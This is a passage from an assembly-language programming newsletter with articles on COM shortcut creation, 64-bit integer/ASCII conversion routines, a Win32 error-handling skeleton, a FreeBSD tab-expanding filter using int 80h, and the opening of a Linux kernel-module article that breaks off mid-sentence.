     invoke GetProcessHeap
     mov hHeap, eax
     invoke HeapAlloc, hHeap, NULL, MAX_PATH * 2
     mov pwsz, eax
     ; and set up some local pointers (we can't use ADDR on local vars)
     lea eax, psl
     mov ppsl, eax
     lea eax, ppf
     mov pppf, eax
     ; Get a pointer to the IShellLink interface.
     invoke CoCreateInstance, ADDR CLSID_ShellLink, NULL,
                              CLSCTX_INPROC_SERVER,
                              ADDR IID_IShellLink, ppsl
     mov hResult, eax
     test eax, eax
     .IF SUCEEDED
         ; Query IShellLink for the IPersistFile
         ; interface for saving the shortcut
         coinvoke psl, IShellLink, QueryInterface, ADDR IID_IPersistFile,
pppf
         mov hResult, eax
         test eax, eax
         .IF SUCEEDED
             ; Set the path to the shortcut target
             coinvoke psl, IShellLink, SetPath, pszPathObj
             mov hResult, eax
             ; add the  description.
             coinvoke psl, IShellLink, SetIconLocation, pszPathObj, 0
             ; use first icon found

             mov hResult, eax
             ; change string to Unicode. (COM typically expects Unicode
strings)
             invoke MultiByteToWideChar, CP_ACP, 0, pszPathLink, -1, pwsz,
MAX_PATH
             ; Save the link by calling IPersistFile::Save
           coinvoke ppf, IPersistFile, Save, pwsz, TRUE
             mov eax, hResult
             ; release the IPersistFile ppf pointer
             coinvoke ppf, IPersistFile, Release
             mov hResult, eax
         .ENDIF
         ; release the IShellLink psl pointer
         coinvoke psl, IShellLink, Release
         mov hResult, eax
     .ENDIF
     ; free our heap space
     invoke HeapFree, hHeap, NULL, pwsz
     mov eax, hResult    ; since we reuse this variable over and over,
                         ;  it contains the last operations result
     ret
CoCreateLink ENDP
;-----------------------------------------------------------

end start
;-----------------------------------------------------------------------


Bibliography:
-------------
"Inside COM, Microsoft's Component Object Model" Dale Rogerson
     Copyright 1997, Paperback - 376 pages CD-ROM edition
     Microsoft Press; ISBN: 1572313498
(THE fundamental book on understanding how COM works on a fundamental level.
Uses C++ code to illustrate basic concepts as it builds simple fully
functional COM object)

"Automation Programmer's Reference : Using ActiveX Technology to Create
     Programmable Applications" (no author listed)
     Copyright 1997, Paperback - 450 pages
     Microsoft Press; ISBN: 1572315849
(This book has been available online on MSDN in the past, but it is cheap
enough for those of you who prefer real books you can hold in your hand.
Defines the practical interfaces and functions that the automation libraries
provide you, but is more of a reference book then a "user's guide")

Microsoft Developers Network
     http://msdn.microsoft.com

"Professional Visual C++ 5 ActiveX/Com Control Programming" Sing Li
     and Panos Economopoulos
     Copyright April 1997, Paperback - 500 pages (no CD, files available
online)
     Wrox Press Inc; ISBN: 1861000375
(Excellent description of activeX control and control site interfaces.
A recent review of this book on Amazon.com stated "These guys are the
type that want to rewrite the world's entire software base in
assembler."  Need I say more?)

"sean's inconsequential homepage"
     http://www.eburg.com/~baxters/
Various hardcore articles on low-level COM and ATL techniques. Coded in C++

"Using COM in Assembly Language" Bill Tyler
     Assembly Language Journal, Apr-June 99
Mr Tyler keeps a web site at:
http://thunder.prohosting.com/~asm1/



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                  64-bit Integer/ASCII
Conversion
                                                  by X-Calibre


The following routines provide an assembly-language library for converting
64-bit integers to and from ASCII, such as would be required when preparing
user-supplied data for qword arithmetic or FPU instructions. The library
consists of the routines ParseRadixSigned, ParseRadixUnsigned,
PrintRadixSigned, and PrintRadixUnsigned, and the macro Divide64. Wrappers
for
calling the routines from C code have also been provided.


ParseRadix
----------
ParseRadix is a pair of routines for converting an ASCII string to a signed
or
unsigned 64-bit integer, using a given radix as a base. The routines take a
pointer to a string and an integer radix as input, and return a 64-bit
number.

;-------------------------------------------------------------------------
ParseRadixUnsigned  PROC
; Input:  Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI

      xor       ebx, ebx

      ; result in EDX::EAX
      xor       eax, eax
      xor       edx, edx

      mov       al, [esi]
      inc       esi
      test eax, eax
      jz        @@endOfParsing

      sub       eax, 30h
      .IF eax > 9
           sub       eax, 7
      .ENDIF

      mov       bl, [esi]

@@smallParseLoop:
      ; ASCII to number conversion
      sub       ebx, 30h
      inc       esi
      mul       edi
      .IF ebx > 9
           sub       ebx, 7
      .ENDIF
      add       eax, ebx
      mov       bl, [esi]
      jc        @@carry
      test ebx, ebx
      jnz       @@smallParseLoop

      ret

@@carry:
      inc       edx
      test ebx, ebx
      jz        @@endOfParsing

@@bigParseLoop:
      ; ASCII to number conversion
      mov       ecx, eax
      mov       eax, edx
      sub       ebx, 30h
      inc       esi
      mul       edi
      xchg eax, ecx
      mul       edi
      .IF ebx > 9
           sub       ebx, 7
      .ENDIF
      add       eax, ebx
      mov       bl, [esi]
      adc       edx, ecx

      test ebx, ebx
      jnz       @@bigParseLoop

@@endOfParsing:
      ret
ParseRadixUnsigned  ENDP

ParseRadixSigned    PROC
; Input:  Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI

      .code
      ; If string does not start with a '-', consider it positive
      cmp       byte ptr [esi], '-'
      jne       ParseRadixUnsigned

      ; Number is negative, first parse the absolute value
      inc       esi

      call ParseRadixUnsigned

      ; Now negate the absolute value to get the negative result
      neg       edx
      neg       eax
      sbb       edx, 0

      ret
ParseRadixSigned    ENDP
;-------------------------------------------------------------------------

The following is a wrapper used for calling the ParseRadix routines from C.
The wrapper provides the following C functions:

extern unsigned __int64 __stdcall
         ParseRadixUnsignedC(char *lpBuffer,  unsigned int radix);

extern signed __int64 __stdcall
         ParseRadixSignedC(char *lpBuffer, unsigned int radix);

;-------------------------------------------------------------------------
.386
.Model Flat, StdCall

.code
include ParseRadix.asm

ParseRadixUnsignedC PROC lpBuffer:PTR BYTE, radix:DWORD
      push esi
      mov       esi, [lpBuffer]
      push edi
      mov       edi, [radix]
      push ebx

      call ParseRadixUnsigned

      pop       ebx
      pop       edi
      pop       esi

      ret
ParseRadixUnsignedC ENDP

ParseRadixSignedC   PROC lpBuffer:PTR BYTE, radix:DWORD
      push esi
      mov       esi, [lpBuffer]
      push edi
      mov       edi, [radix]
      push ebx

      call ParseRadixSigned

      pop       ebx
      pop       edi
      pop       esi

      ret
ParseRadixSignedC   ENDP

END
;-------------------------------------------------------------------------


Divide64
--------
Divide64 is a macro for doing 64-bit division using 32-bit integer
instructions.
Note that this is a 'long division' algorithm. It can easily be expanded to
be able to divide any number by 32 bits. I only use it for 64 bits here to
keep the CPU from getting an exception on overflow when the input is larger
than ((2^32)-1)*divisor, so that printing any 64 bit number with any radix
is possible.

;-------------------------------------------------------------------------
Divide64       MACRO
; Input:  64 bit dividend in EBX::ECX, 32 bit divisor in ESI
; Output: 64 bit result in EBX::EAX, 32 bit remainder in EDX
; Uses:        EAX, EBX, ECX, EDX, ESI

      ; Divide high dword by divisor.
      mov       eax, ebx
      xor       edx, edx
      div       esi
      ; Put remainder as high dword of the original dividend.
      mov       ebx, eax
      mov       eax, ecx
      div       esi

ENDM
;-------------------------------------------------------------------------


PrintRadix
----------
PrintRadix is a pair of routines for converting signed and unsigned 64-bit
numbers to an ASCII, string, using a given radix as base. These routines
take a
64-bit number and an integer radix as inpit, and return the pointer to a
character buffer.

;-------------------------------------------------------------------------
PrintRadixUnsigned  PROC
; Input:  64 bit unsigned number in EBX::ECX, radix in ESI, pointer to
output
;           buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
;           EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI, EBP

      xor       ebp, ebp  ; StringLength counter

      ; If the high dword of the number is larger than the divisor, we
      ; have to do a 'long division' to prevent overflow.
      cmp       ebx, esi
      jb        smallDiv

longDiv:
      Divide64

      ; Convert the remainder to an ASCII char.
      add       edx, 30h
      dec       esp
      .IF  edx > 39h
           add       edx, 7
      .ENDIF

      ; Store char on stack.
      inc       ebp
      ; While result is not 0, we loop.
      test eax, eax
      mov       ecx, eax
      mov       [esp], dl
      jz        lowDWORDIsZero

      cmp       ebx, esi
      jae       longDiv

smallDiv:
      ; Set EBX::ECX to EDX::EAX for a normal 64->32 division.
      mov       edx, ebx
      mov       eax, ecx

radixLoopSmall:
      div       esi

      ; Convert the remainder to an ASCII char.
      add       edx, 30h
      dec       esp
      .IF  edx > 39h
           add       edx, 7
      .ENDIF

      ; Store char on stack.
      inc       ebp
      mov       [esp], dl
      ; Clean out high dword for next division.
      xor       edx, edx
      ; While result is not 0, we loop.
      test eax, eax
      jnz       radixLoopSmall

toBuffer:
      mov       eax, ebp  ; Return stringlength (not including 0-terminator)

toBufferLoop:
      ; Copy the string from stack to the destination buffer.
      inc       edi
      mov       dl, [esp]
      inc       esp
      dec       ebp
      mov       [edi-1], dl
      jnz       toBufferLoop

      ; Zero terminate the string.
      mov       byte ptr [edi], 0

      ret

lowDWORDIsZero:
      test ebx, ebx
      jnz       longDiv

      ; We have the final string, time to copy it to the destination buffer.
      jmp       toBuffer
PrintRadixUnsigned  ENDP

PrintRadixSigned    PROC
; Input:  64 bit signed number in EBX::ECX, radix in ESI, pointer to output
;           buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
;           EAX
; Uses:        EAX, EBX, ECX, EDX, ESI, EDI, EBP

      ; If number is non-negative, use the normal PrintRadix
      test ebx, ebx
      jns       PrintRadixUnsigned

      ; Prefix the number with a - sign
      mov       byte ptr [edi], '-'
      inc       edi

      ; Negate the 64 bit number
      neg       ebx
      neg       ecx
      sbb       ebx, 0

      ; Do a normal PrintRadix
      call PrintRadixUnsigned
      inc       eax
      ret
PrintRadixSigned    ENDP
;-------------------------------------------------------------------------

The following is a wrapper used for calling the PrintRadix routines from C.
The wrapper provides the following C functions:

extern unsigned int __stdcall
         PrintRadixUnsignedC(char *lpBuffer, unsigned __int64 number,
                             unsigned int radix);

extern unsigned int __stdcall
         PrintRadixSignedC(char *lpBuffer, signed __int64 number,
                           unsigned int radix);

;-------------------------------------------------------------------------
.386
.Model Flat, StdCall

.code
include PrintRadix.asm

PrintRadixUnsignedC      PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
      push ebp
      mov       ecx, dword ptr [number]
      push ebx
      mov       ebx, dword ptr [number+sizeof DWORD]
      push esi
      mov       esi, [radix]
      push edi
      mov       edi, [lpBuffer]

      call PrintRadixUnsigned

      pop       edi
      pop       esi
      pop       ebx
      pop       ebp

      ret
PrintRadixUnsignedC      ENDP

PrintRadixSignedC        PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
      push ebp
      mov       ecx, dword ptr [number]
      push ebx
      mov       ebx, dword ptr [number+sizeof DWORD]
      push esi
      mov       esi, [radix]
      push edi
      mov       edi, [lpBuffer]

      call PrintRadixSigned

      pop       edi
      pop       esi
      pop       ebx
      pop       ebp

      ret
PrintRadixSignedC        ENDP
END
;-------------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                     Win32 AppFatalExit
Skeleton
                                                     by Chili


This is just a Win32 application  skeleton with a small procedure  that
manages
fatal errors,  by displaying  an information  message box  and terminating
the
process.

I think the code  is pretty much self  explanatory  and I commented  it to
some
degree, so there's not much to say. To close the black window just hit
ESCAPE.

The only  one thing that  isn't that quite  right is the fact that  you have
to
code the line  numbers by hand and so  if you change anything  above
previously
coded numbers, you'll have to do them again... oh well!

To assemble get the MASM32 package from: http://www.pbq.com.au/home/hutch/

--8<---------------------------------------------------------------------------

; SKELETON.ASM
; Win32 AppFatalExit Skeleton
; by Chili for APJ #8
; August 11, 2000

;##############################################################################
; Compiler Options
;##############################################################################

     title Win32 AppFatalExit Skeleton

     .386
     .model flat, stdcall    ; 32-bit memory model
     option casemap :none    ; case sensitive

;##############################################################################
; Includes
;##############################################################################

     ;// Include Files
     include \masm32\include\windows.inc
     include \masm32\include\gdi32.inc
     include \masm32\include\user32.inc
     include \masm32\include\kernel32.inc
     include \masm32\include\comctl32.inc
     include \masm32\include\comdlg32.inc
     include \masm32\include\shell32.inc

     ;// Libraries
     includelib \masm32\lib\gdi32.lib
     includelib \masm32\lib\user32.lib
     includelib \masm32\lib\kernel32.lib
     includelib \masm32\lib\comctl32.lib
     includelib \masm32\lib\comdlg32.lib
     includelib \masm32\lib\shell32.lib

;##############################################################################
; Equates
;##############################################################################

     ;// Basic
     NULL    equ 0
     FALSE   equ 0
     TRUE    equ 1

;##############################################################################
; Local Prototypes
;##############################################################################

     ;// Main Program Procedures.
     WinMain         PROTO   :DWORD, :DWORD, :DWORD, :DWORD
     WndProc         PROTO   :DWORD, :DWORD, :DWORD, :DWORD
     AppFatalExit    PROTO   :DWORD, :DWORD

;##############################################################################
; Local Macros
;##############################################################################

     ;// Return a value in EAX.

     return MACRO arg
         IFNB <arg>
             mov     eax, arg
         ENDIF
         ret
     ENDM

     ;// Memory-to-memory MOV.

     m2m MACRO m1:REQ, m2:REQ
         push    m2
         pop     m1
     ENDM

     ;// Memory copy.

     mcopy MACRO destination:REQ, source:REQ
         cld
         lea     esi, source
         lea     edi, destination
         mov     ecx, sizeof source
     rep movsb
     ENDM

     ;// Insert zero terminated string into code section.

     szText MACRO name:REQ, text:VARARG
         LOCAL   lbl
         jmp     lbl
         name    db  text, 0
       lbl:
     ENDM

     ;// Insert zero terminated string into .data section.

     dszText MACRO name:REQ, text:VARARG
     .data
         name    db  text, 0
     .code
     ENDM

     ;// Return in EBX the ASCII size of a DWORD value

     dwsize MACRO value:REQ
         xor     ebx, ebx
         mov     eax, value
         .if eax == 0
             inc     ebx
         .else
             mov     ecx, 10
             .while eax > 0
                 xor     edx, edx
                 div     ecx
                 inc     ebx
             .endw
         .endif
     ENDM

;##############################################################################
; Initialized Data Section
;##############################################################################

.data

;##############################################################################
; Uninitialized Data Section
;##############################################################################

.data?

;##############################################################################
; Constants Section
;##############################################################################

.const

;##############################################################################
; Code Section
;##############################################################################

.code

;==============================================================================
; Beginning of executable code
;==============================================================================
start   proc

     ;// Do some base initialization for the WinMain function and upon its
     ;// ending, terminate process.

     LOCAL   hModule :DWORD

     ;// Get handle to current instance.

     invoke  GetModuleHandle, NULL
     .IF eax == NULL
         dszText szGetModuleHandle_157, "GetModuleHandle, ln #157"
         invoke  AppFatalExit, addr szGetModuleHandle_157,
                               sizeof szGetModuleHandle_157
     .ENDIF
     mov     hModule, eax

     ;// Get pointer to the command-line string for the current process.

     invoke  GetCommandLine

     ;// Call initial entry point for a Win32-based application.

     invoke  WinMain, hModule, NULL, eax, SW_SHOWMAXIMIZED

     ;// End process and all its threads.

     invoke  ExitProcess, eax

start   endp

;==============================================================================
; WinMain Function (Called by the system as the initial entry point for a
;                   Win32-based application)
;==============================================================================
WinMain proc    hInstance       :DWORD, ;// handle to current instance
                 hPrevInstance   :DWORD, ;// handle to previous instance
                 lpCmdLine       :DWORD, ;// pointer to command line
                 nCmdShow        :DWORD  ;// show state of window

     ;// Perform initialization, create and display a main window and enter a
     ;// message retrieval-and-dispatch loop.

     LOCAL   wc          :WNDCLASSEX
     LOCAL   hwndMain    :DWORD
     LOCAL   msg         :MSG

     ;// Register the window class for the main window.

     mov     wc.cbSize, sizeof WNDCLASSEX
     mov     wc.style, CS_OWNDC
     mov     wc.lpfnWndProc, offset MainWndProc
     mov     wc.cbClsExtra, 0
     mov     wc.cbWndExtra, 0
     m2m     wc.hInstance, hInstance
     invoke  LoadIcon, NULL, IDI_APPLICATION
     .if eax == NULL
         dszText szLoadIcon_203, "LoadIcon, ln #203"
         invoke  AppFatalExit, addr szLoadIcon_203, sizeof szLoadIcon_203
     .endif
     mov     wc.hIcon, eax
     invoke  LoadCursor, NULL, IDC_ARROW
     .if eax == NULL
         dszText szLoadCursor_209, "LoadCursor, ln #209"
         invoke  AppFatalExit, addr szLoadCursor_209, sizeof szLoadCursor_209
     .endif
     mov     wc.hCursor, eax
     invoke  GetStockObject, BLACK_BRUSH
     .if eax == NULL
         dszText szGetStockObject_215, "GetStockObject, ln #215"
         invoke  AppFatalExit, addr szGetStockObject_215,
                               sizeof szGetStockObject_215
     .endif
     mov     wc.hbrBackground, eax
     mov     wc.lpszMenuName, NULL
     dszText  szClassName, "MainWndClass"
     mov     wc.lpszClassName, offset szClassName
     mov     wc.hIconSm, NULL

     invoke  RegisterClassEx, addr wc
     .if eax == 0
         dszText szRegisterClassEx_227, "RegisterClassEx, ln #227"
         invoke  AppFatalExit, addr szRegisterClassEx_227,
                               sizeof szRegisterClassEx_227
     .endif

     ;// Create the main window.

     dszText szDisplayName, "Win32 AppFatalExit Skeleton"
     invoke  CreateWindowEx, NULL, addr szClassName, addr szDisplayName,
                             WS_POPUP or WS_CLIPSIBLINGS or WS_MAXIMIZE or \
                             WS_CLIPCHILDREN, CW_USEDEFAULT, CW_USEDEFAULT,
                             CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL,
                             hInstance, NULL

     ;// If the main window cannot be created, terminate the application.

     .if eax == NULL
         dszText szCreateWindowEx_237, "CreateWindowEx, ln #237"
         invoke  AppFatalExit, addr szCreateWindowEx_237,
                               sizeof szCreateWindowEx_237
     .endif
     mov     hwndMain, eax

     ;// Show the window and paint its contents.

     invoke  ShowWindow, hwndMain, nCmdShow
     invoke  UpdateWindow, hwndMain
     .if eax == NULL
         dszText szUpdateWindow_255, "UpdateWindow, ln #255"
         invoke  AppFatalExit, addr szUpdateWindow_255,
                               sizeof szUpdateWindow_255
     .endif

     ;// Start the message loop.

     .while TRUE
         invoke  PeekMessage, addr msg, NULL, 0, 0, PM_REMOVE
         .if (eax != 0)
             .break .if msg.message == WM_QUIT

             invoke  TranslateMessage, addr msg
             invoke  DispatchMessage, addr msg
         .endif
     .endw

     ;// Return the exit code to Windows.

     return  msg.wParam

WinMain endp

;==============================================================================
; WindowProc Function (Application-defined callback function that processes
;                      messages sent to a window)
;==============================================================================
MainWndProc proc    hwnd    :DWORD, ;// handle of window
                     uMsg    :DWORD, ;// message identifier
                     wParam  :DWORD, ;// first message parameter
                     lParam  :DWORD  ;// second message paramater

     ;// Dispatch the messages that can be received.

     .if uMsg == WM_KEYDOWN

         ;// Process keyboard input by means of a key press.

         .if wParam == VK_ESCAPE

             ;// Clean up window-specific data objects.

             invoke  PostQuitMessage, NULL
             return  0
         .endif

     .elseif uMsg == WM_DESTROY

         ;// Clean up window-specific data objects.

         invoke  PostQuitMessage, NULL
         return  0
     .endif

     ;// Process other messages.

     invoke  DefWindowProc, hwnd, uMsg, wParam, lParam

     ret

MainWndProc endp

;==============================================================================
; Application Fatal Exit Procedure
;==============================================================================
AppFatalExit    proc    lpszCaption :DWORD, ;// pointer to string to display
in
                         \                   ;// caption of the message box
                         nSize       :DWORD  ;// size of caption

     ;// Display a message box and terminate.

     LOCAL   uExitCode       :DWORD
     LOCAL   lpBuffer        :DWORD
     LOCAL   szFatalMessage  [256]:BYTE
     LOCAL   nSizeMsg        :DWORD
     LOCAL   szFatalCaption  [64]:BYTE

     ;// Get the calling thread's last-error code value.

     invoke  GetLastError
     mov     uExitCode, eax

     ;// Obtain error message string.

     invoke  FormatMessage, FORMAT_MESSAGE_ALLOCATE_BUFFER or \
                            FORMAT_MESSAGE_FROM_SYSTEM, NULL, uExitCode, 0,
                            addr lpBuffer, 0, NULL
     .if eax == NULL
         dwsize  uExitCode
         mov     nSizeMsg, ebx
         invoke  GetLastError
         push    eax
         dwsize  eax
         add     nSizeMsg, ebx
         pop     eax
         dszText szDoubleFmt, "#%lu [& #%lu]"
         invoke  wsprintf, addr szFatalMessage, addr szDoubleFmt, uExitCode,
eax
         add     nSizeMsg, 7
         .if eax != nSizeMsg
             dszText szDoubleMessage, "#??? [& #???]"
             mcopy   szFatalMessage, szDoubleMessage
         .endif
     .else
         mov     nSizeMsg, eax
         dwsize  uExitCode
         add     nSizeMsg, ebx
         dszText szFmt, "#%lu - %s"
         invoke  wsprintf, addr szFatalMessage, addr szFmt, uExitCode,
lpBuffer
         add     nSizeMsg, 4
         .if eax != nSizeMsg
             dszText szMessage, "#??? - ?????"
             mcopy   szFatalMessage, szMessage
         .endif
         invoke  LocalFree, lpBuffer ;// Possible errors in LocalFree ignored
     .endif

     ;// Display the application fatal exit message box.

     dszText szCaptionFmt, "Fatal: %s"
     invoke  wsprintf, addr szFatalCaption, addr szCaptionFmt, lpszCaption
     add     nSize, 6
     .if eax != nSize
         dszText szCaption, "Fatal: ?????, ln #???"
         mcopy   szFatalCaption, szCaption
     .endif
     invoke  MessageBox, NULL, addr szFatalMessage, addr szFatalCaption,
                         MB_ICONHAND or MB_SYSTEMMODAL

     ;// End process and all its threads.

     invoke  ExitProcess, eax

AppFatalExit    endp

end start
---------------------------------------------------------------------------8<--



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                      System Calls in FreeBSD
                                                      by G. Adam Stanislav


Assembly language programing under Unix is highly undocumented. It is
generally
assumed that no one would ever want to use it because various Unix systems
run
on different microprocessors, so everything should be written in C for
portability.

Now, we know that C portability is a myth. Even C programs need to be
modified
when ported from one Unix to another, regardless of what processor each runs
on.

I was pleasantly surprised when one of FreeBSD hackers recently posted an
assembly language 'Hello, World' program on the web. See
http://home.ptd.net/~tms2/hello.html for what he has to say.

There were two things I did not like in his example:

First of all, he uses the GNU assembler with its AT&T syntax. Talk about
lack
of portability! Ever since I got involved in Unix programming, I switched
from
MASM to NASM and never looked back. NASM allows me to use the same code for
Windows and Unix with only minor modifications needed wherever system calls
are
necessary. Everything else remains the same.  I also like the fact I can use
dots in the middle of a label.

Secondly, he uses a separate procedure for the system call. It looks like
this
(in AT&T syntax):

         do_syscall:
                 int     $0x80           # Call kernel.
                 ret

He says a direct use of int 80h would not work. I refused to believe it.
And I
was right. The "problem" he is solving by using a separate procedure is the
fact that int 80h is optimized for the use with C programs which make calls
to
functions like write() and read(). Because they make a call, an extra DWORD
is
pushed on the stack before invoking int 80h.

His solution works, of course, but is unnecessary. All that is needed is
pushing an extra DWORD before invoking int 80h. The value pushed is
irrelevant.
In my modification to his code, I simply pushed EAX and invoked int 80h.
Then I
added an extra four bytes to ESP. I already had to increase it anyway
because
int 80h uses C calling convention of receiving parameters on the stack and
leaving them there. It worked without a hitch.

I learned from his code that the value in EAX determines which system call
int
80h makes. A list of these can be found in the C include file
<sys/syscall.h>.

I then decided to experiment with his code a bit further, and create
something
that actually does some work.

A typical Unix program is a filter which reads its input from stdin, writes
its
output to stdout, and sends error messages to stderr. I decided to produce
such
a filter for this article. Because I used tabs in my source code and needed
to
convert them to spaces for this article, I made the filter convert tabs to
spaces. Because I started writing it under Windows and finished it under
Unix,
I also made the filter strip any carriage returns.

It would be more useful if it could accept command line parameters, so you
could decide how many spaces a tab should expand to. Alas, I have no idea
where
to find the command line under FreeBSD. If you know, please email me at
adam@.... For now, the program simply assumes a tab stop is at
every 8th position.

The program uses ESI as a counter of where on the line it is. To calculate
the
number of blanks to insert, it moves ESI to EAX, negates EAX, ands it with
seven, and adds 1. This works very well. Suppose you are at the beginning of
the line, i.e., at the first position. So, you turn 1 into -1, i.e.,
0FFFFFFFFh. And it with 7, you get 7. Increase that, and you know you need
to
write 8 spaces.

I also used EDI as the pointer to the read/write buffer. I could have just
pushed its offset (push dword buffer) every time, but pushing a register
produces less code and is probably faster.

I chose ESI and EDI to hold persistent values (i.e., values that need to
survive the system call) because Unix system software uses the C convention
of
preserving these two registers (as well as EBX and EBP).

In my first version I started the program with a PUSHAD and ended it a
POPAD.
This is certainly needed in Windows programs: An assembly language program
will
crash Windows if it returns to Windows with any of the four aforementioned
registers modified.

Then I thought that surely FreeBSD would not allow such a serious security
hole
in the system. I removed the PUSHAD and the POPAD, and the program worked
without a hitch.


The result is below.

;---------------------------------------------------------------------------
;       File: tab2sp.asm
;
;       A sample assembly language program for FreeBSD.
;       It converts tabs to spaces. Nothing new, expand
;       already does that and with more options.
;
;       But it illustrates reading from stdin, and writing
;       to stdout and stderr in assembly language.
;
;       05-May-2000
;       Copyright 2000 G. Adam Stanislav
;       All rights reserved
;
;       http://www.whizkidtech.net/
;       http://www.redprince.net/
;
;       Assemble with nasm:
;
;       nasm -f tab2sp.asm
;       ld -o tab2sp tab2sp.o

section .data
buffer  times 8 db      ' '
errread db      'TAB2SP: Error reading input', 0Ah
erlen   equ     $-errread
align 4, db 0
errwrite        db      'TAB2SP: Error writing output', 0Ah
ewlen   equ     $-errwrite

section .code
; ld expects every program to start with _start
global  _start
_start:

         ; We use EDI and ESI to store persistent data
         ; because syscall will not modify them.
         mov     edi, buffer             ; EDI = address of buffer
         sub     esi, esi                ; ESI = counter

         ; NOTE:
         ;
         ; Because int 80h expects to be within a separate
         ; procedure, we need to push a fake return address
         ; before invoking it. It can be anything, so we
         ; just push EAX.

.read:
         sub     eax, eax
         inc     al
         push    eax                     ; size of "string"
         push    edi                     ; address of buffer
         dec     al
         push    eax                     ; stdin = 0
         push    eax                     ; "return address"
         mov     al, 3                   ; SYS_read
         int     80h                     ; syscall
         add     esp, byte 16            ; clean the stack after reading

         or      eax, eax
         je      .quit                   ; end of file reached
         js      .rerror                 ; read error...

         ; Decide what to do:
         ;
         ; If the byte is a carriage return, ignore it.
         ; If the byte is a newline, initialize ESI = 0.
         ; If the byte is a tab, convert it to spaces.
         ; Otherwise, just write it.

         mov     dl, [edi]
         cmp     dl, 0Dh                 ; carriage return
         je      .read
         cmp     dl, 0Ah                 ; new line
         je      .newline
         inc     esi
         cmp     dl, 09h                 ; tab
         jne     .write

         ; It's a tab. Expand it.
         mov     byte [edi], ' '
         mov     eax, esi
         neg     eax
         and     eax, 7
         add     esi, eax
         inc     eax
         jmp     short .write

.newline:
         sub     esi, esi

.write:
         push    eax                     ; size of "string"
         push    edi                     ; address of buffer
         sub     eax, eax
         inc     al
         push    eax                     ; stdout = 1
         push    eax                     ; "return address"
         mov     al, 4                   ; SYS_write
         int     80h                     ; system call
         add     esp, byte 16
         or      eax, eax
         jns     short .read

         push    dword ewlen
         push    dword errwrite
         jmp     short .err

.rerror:
         push    dword erlen
         push    dword errread
.err:
         sub     eax, eax
         mov     al, 2                   ; stderr = 2
         push    eax
         push    eax                     ; "return address"
         add     al, al                  ; SYS_write
         int     80h
         add     esp, byte 16

.quit:
         sub     eax, eax                ; EAX = 0
         push    eax                     ; exit status
         inc     eax                     ; SYS_exit
         push    eax                     ; "return address"
         int     80h
         ; Program ends here.
;--------------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                         Loadable Kernel
Modules
                                                         by mammon_



If there is one area in linux that is sure to attract assembly language
coders,
it is the coding of loadable kernel modules; after all, asm programmers
aren't
known for waiting around in Ring 3 space waiting for the CPU to assign their
process some resources.

Kernel modules are Ring 0 programs that are dynamically linked into a
running
kernel; they require LKM support in the kernel [ CONFIG_MODULES ]. Each
kernel
ships with a given number of kernel modules, as most device drivers are
compiled as such; the modules are located in /lib/modules/kernel_version#.
Modules are managed with the commands insmod [load module], modprobe [load
module and all modules it depends on], lsmod [list loaded modules], and
rmmod
[unload module]; information on loaded modules can also be obtained from the
/proc file system, e.g. /proc/modules.


Kernel Land
-----------
It need hardly be said that kernel-space programming is different from
user-space progamming. For starters, simple bugs can panic the kernel, or
render kernel subsystems unreliable if not actually inoperable. It is
advisable, when developing kernel modules, to become well-acquainted with
the
"Magic SysReq Key" commands.

There is no main function. Kernel modules must export the init_module and
cleanup_module routines; these will be called by the kernel when the module
is
loaded and unloaded. The rest of the kernel module will generally consist of
callback routines which are executed in response to system events [i.e.
ioctl()
calls, reading of /proc files, syscalls, interrupts].

The standard C libraries are also unavailable -- they are far away, in the
user-space shared by all normal, well-behaved programs. The only external
routines that a kernel module can call are those listed in the kernel symbol
table [which can be browsed via /proc/ksyms] and the INT 80 syscalls. Some
basic C-style routines are provided by the kernel, and are prototyped in
$INCLUDE/linux/kernel.h:
      simple_strtol(const char *,char **,unsigned int);
      sprintf(char * buf, const char * fmt, ...);
      vsprintf(char *buf, const char *, va_list);
      get_option(char **str, int *pint);
      memparse(char *ptr, char **retptr);
      printk(const char * fmt, ...)
Note that the standard kernel routines are documented in section 9 of the
manual, and can be browsed with
      ls -1 /usr/man/man9 | cut -d. -f1
As mentioned in a previous article, the syscalls are listed in
/usr/include/asm/unistd.h .

Finally, accessing user-space memory is not easy. In C, there are macros
provided for this -- get_user(), put_user(), copy_from_user(),
copy_to_user()
... all defined in $INCLUDE/asm/uaccess.h -- and these boil down to inline
assembler routines that can be accessed, somewhat awkwardly, from routines
listed in the kernel symbol table [e.g. __get_user_1 and so on]. In general,
it
is best to leave user/kernel-space interaction to /proc and /dev files.


Developing Kernel Modules
-------------------------
What does all of this mean in terms of assembly language? Essentially, asm
kernel modules will have the same problems as C kernel modules, with the
added
bonus that none of the C macros for kernel-mode programming will work.

When programming kernel modules, one is more or less restricted to using the
GAS assembler. NASM can be made to work, but by default it produces object
files in format that the kernel module loader cannot recognize [note:
RedPlait
has produced a patch for NASM to fix this; in addition, it is possible to
write a libBFD post-processor which will re-assemble the sections in the
appropriate order]. Information on GAS invocation and syntax can be obtained
from the 'as' manpage and info file, and the GAS preprocessor is documented
in the 'gasp' info page.  Note that the info files can be accessed randomly
by
appending the sequence of menu selections to the command; thus
     info as Machine i386 i386-Syntax
would load the 'as' info section for i386 syntax details.

Kernel modules are unlinked object files -- they are linked to the kernel
dynamically, and so should not be run through ld. Using gcc, a kernel module
can be compiled with
